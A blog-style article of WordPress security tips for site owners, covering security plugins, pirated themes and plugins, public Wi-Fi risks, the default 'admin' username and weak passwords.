You’re making more WordPress security mistakes besides those updates you keep neglecting to do. Avoiding regular updates is the most common security mistake, but there are more mistakes that also put your site at risk for attack.
Because WordPress is open source, those miscreants who wish to do harm can easily obtain the source code and study it for ways to hack in. Combine this with the popularity of WordPress and it’s like you have a bulls-eye target on you.
The good news is you don’t have to do anything drastic, like change to a much less user-friendly CMS that doesn’t have all the fabulous plugins and themes, all for free. All you have to do is follow these tips to button down your site and stay safe from attacks.
Lacking a First Line of Defense: No Security Plugin
There are many security plugins to choose from with different pricing, including some free options. While it’s true that having too many plugins can be a bad idea, having one that actually protects your site is a no-brainer.
This list of the Top 10 Essential WordPress Plugins is a good place to start. It includes Wordfence, a personal favorite of mine. These give you an extra layer of security by addressing the issues most prevalent, leaving you free to run your business worry-free.
Installing Bad Plugins and Themes
If a plugin is available for free that you would normally have to pay for, consider this a giant red flag. A pirated plugin or theme may be free, but it’s also going to be potentially rife with dire consequences.
Disreputable plugins and themes come with a catch. Not only are they dishonest and often stealing from hard-working developers, they can be infected with malware that will inject malicious code into your website. Once they’ve made this connection to your site, it’s like a backdoor where they can get in and do all kinds of damage.
Beware also of WordPress themes that look totally safe. If the theme isn’t from the WordPress Theme Directory, or isn’t from a source you know and trust, then you shouldn’t install it. There are hundreds of themes available, and they all have to pass selection criteria that includes possessing no unsafe code.
Surfing In Public Wi-Fi Waters
Sure, you’ve heard it all before, but do you really avoid using your credentials and private information on the internet when using a public Wi-Fi hotspot? These places include high-density areas such as airports, libraries, hotels, cafes, and, of course, Starbucks.
The ease with which attackers can steal your information is due to the fact that, according to Public WiFi, public WiFi networks are “almost always unencrypted, which means that anyone with cheap, easily available software can listen in and access everything being sent over the network.”
The hacks in a public WiFi hotspit can include Sniffers, Evil Twin, Man-in-the-Middle Attacks, and Sidejacking. The names are almost enough to steer you away from exposing your website and other information to attack.
Using “Admin” For Your Username
Your WordPress site has an automatically generated username with the Administrator role. This role has permissions that are referred to as admin, which allow this user to do anything they want. An Administrator has total power over the website, including deleting your whole site.
The last thing you want to do is keep the original username “admin” as the name for someone who has total access. This is the first thing a hacker will use when trying to break into your site. Once they’ve figured out your username, then all they have to do is guess your password. You’re giving away half the access information with admin still intact. See the list of targeted usernames in the recent brute-force attack here. Clearly admin is a common guess.
You can do one of two things:
- Don’t use or, even better, remove your admin username. But before you do this, create a new user with the admin role. Functioning under this new username, you can delete the old username of admin.
- If you want to do this in C-panel, read this user-friendly post on How To Change Your Username. If I can do it, you can too.
The Wordfence plugin allows you to block any IP address you want, so if you find one is continually attempting to log in using the admin username, block it.
Using Really Obvious Passwords
The list of top passwords for 2014 contains the same weak passwords, with “123456” and “password” holding the top two spots. It appears that all the advice on the internet about using strong passwords is going unheeded.
Use your imagination when creating your passwords and follow the Google’s tips, use a password generator, or take Edward Snowden’s password advice to John Oliver and use “pass phrases” that are easy for you to remember, but difficult for computers to crack. Try one of the top five password managers to help you remember them all.
You can always sign up for a worry-free program with your web hosting company and let them take care of all your site’s security. If you’re running a small business, it’s a huge timesaver as well. Good luck — it’s a Digital Wild West out there.